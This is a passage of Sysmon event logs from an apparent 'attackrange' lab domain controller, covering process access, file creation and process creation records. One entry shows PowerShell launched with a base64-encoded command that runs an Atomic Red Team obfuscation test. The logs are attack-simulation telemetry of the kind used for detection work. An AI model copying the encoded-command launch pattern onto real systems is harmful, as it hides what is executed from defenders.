C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.390","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5165,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.406\r\nProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nProcessId: 3064\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mfy43af2.dky.ps1\r\nCreationUtcTime: 2020-08-01 05:52:43.406","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.406","ProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mfy43af2.dky.ps1","CreationUtcTime":"2020-08-01 05:52:43.406","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5166,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.437\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.437","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5167,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.437\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.437","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5168,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.784\r\nProcessGuid: {A837DB8D-032B-5F25-0000-001046010A00}\r\nProcessId: 3820\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nParentProcessId: 3064\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.784","ProcessGuid":"{A837DB8D-032B-5F25-0000-001046010A00}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","ParentProcessId":"3064","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5169,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001046010A00}\r\nTargetProcessId: 3820\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47f9c4bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743dc79|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d815|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001046010A00}","TargetProcessId":"3820","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47f9c4bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743dc79|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d815|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5170,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001046010A00}\r\nTargetProcessId: 3820\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001046010A00}","TargetProcessId":"3820","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5171,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 